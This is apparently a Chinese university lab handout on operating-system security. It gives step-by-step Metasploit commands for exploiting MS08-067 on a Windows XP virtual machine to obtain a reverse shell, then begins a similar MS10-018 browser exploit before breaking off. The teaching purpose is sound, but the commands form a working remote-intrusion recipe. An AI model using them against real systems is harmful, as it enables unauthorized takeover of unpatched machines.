计算机系统安全 实验二-metasploit

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

计算机系统安全实验二:

操作系统安全与metasploit渗透测试

实验目的:

学习计算机操作系统安全相关内容。

学习操作系统渗透相关内容

学习metasploit渗透工具使用。

实验原理:

Windows 操作系统安全结构

网络渗透原理

实验环境:

软件:vmware 环境下,

虚拟机,vm-WinXP镜像

虚拟机,backtrack 4及backtrack 5 虚拟机镜像等。

实验拓扑:

被渗透机:使用虚拟机XP,建议使用未安装更新的英文XP操作系统,,设置其IP 地址为,自动获得,虚拟机网络连接方式NAT方式。实验室计算机network系统下中network_vm 目录中有metasploitable_XP,可使用之。

渗透测试机:使用Bt4或5作为操作系统,

准备工作:

启动两台虚拟机,按上图方式设置,请先记录下两台虚拟机的IP:

被渗透机:

操作系统:____windows xp with sp1_________

IP地址:渗透测试机:

操作系统:___________bt5_______

IP地址:注意,若网络连接未启用,请先启用之,linux 下可使用ifup eth0)

实验内容:

第一部分:针对操作系统内部服务端口进行渗透了解ms08-067漏洞详情:

(请课后上网查询相关内容)

漏洞描述:

曾经的冲击波、震荡波等大规模攻击都是由于Windows的RPC服务漏洞造成的,MS08-067远程溢出漏洞也不例外。MS08-067远程溢出漏洞的原因是由于Windows系统中RPC存在缺陷造成的,Windows系统的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,如果受影响的系统收到了特制伪造的RPC请求,可能允许远程执行代码,导致完全入侵用户系统,以SYSTEM权限执行任意指令并获取数据,并获取对该系统的控制权,造成系统失窃及系统崩溃等严重问题。

漏洞对象:

受MS08-067远程溢出漏洞影响的系统非常多,受影响的操作系统有Windows XP /2000/Vista/2003等。除Windows Server 2008 Core外,基本上所有的Windows系统都会遭受此漏洞的攻击,特别是在Windows 2000、Windows XP和Windows Server 2003系统,攻击者可以利用此漏洞无需通过认证运行任意代码。这个漏洞还可能被蠕虫利用,此安全漏洞可以通过恶意构造的网络包直接发起攻击,并且攻击者可以获取完整权限,因此该漏洞很可能会被用于制作蠕虫以进行大规模的攻击。

漏洞端口:

_______445_________________________________________________

步骤一:

启动metasploit 控制台msfconsole

记录其

步骤二:

搜索模块ms08-067号模块

search ms08-067

找到模块,记录其名称,级别,描述步骤三:

使用这个模块

use windows/smb/ms08_067_netapi

步骤四:

查找有用的payloads

show payloads

步骤五:

使用其中最常用的一个payload

set payload windows/shell/reverse_tcp

步骤六:

查看当前的这个payload 以及攻击所需要的参数选项show options

发现模块所需要选项,有些有默认参数: RPORT ,SMBPIPE

有些没有RHOST

发现payload所需要参数,有些有默认参数: EXITFUNC ,LPORT

有些没有: LHOST

渗透的目标设置值: 0

步骤七:

设置参数

set RHOST 被渗透主机的IP地址

set LHOST 渗透测试主机的IP地址。

步骤八:

show options 查看当前参数设置是否齐全。

步骤九:

show targets 查看当前攻击的目标。

0 若有,则表示可进行自动选择攻击。

其他,则为特定选择特定系统。

步骤十:

参数齐全,目标选定,渗透载荷准备就绪,然后实施。

exploit

渗透开始。。。。。

自动创建一shell (命令提示符)

使用ipconfig 及dir等命令确定当前控制的计算机是哪台。

打开放大镜:

步骤十一:

Exit 然后再exit退出。

第二部分:针对操作系统下的浏览器进行渗透步骤一:浏览器漏洞MS10-018

了解ms10-018漏洞详情:

(请课后上网查询相关内容)

漏洞描述:

漏洞对象:

漏洞端口:

8080

步骤一:

启动metasploit 控制台

msfconsole

步骤二:

搜索模块ms10-018号模块

search ms10-018

找到模块,记录其名称,级别,描述

步骤三:

使用这个模块

use windows/browser/ms10_018_ie_behaviors

步骤四:

查找有用的payloads

show payloads

步骤五:

使用其中最常用的一个payload

set payload windows/shell/reverse_tcp

步骤六:

查看当前的这个payload 以及攻击所需要的参数选项

相关文档
最新文档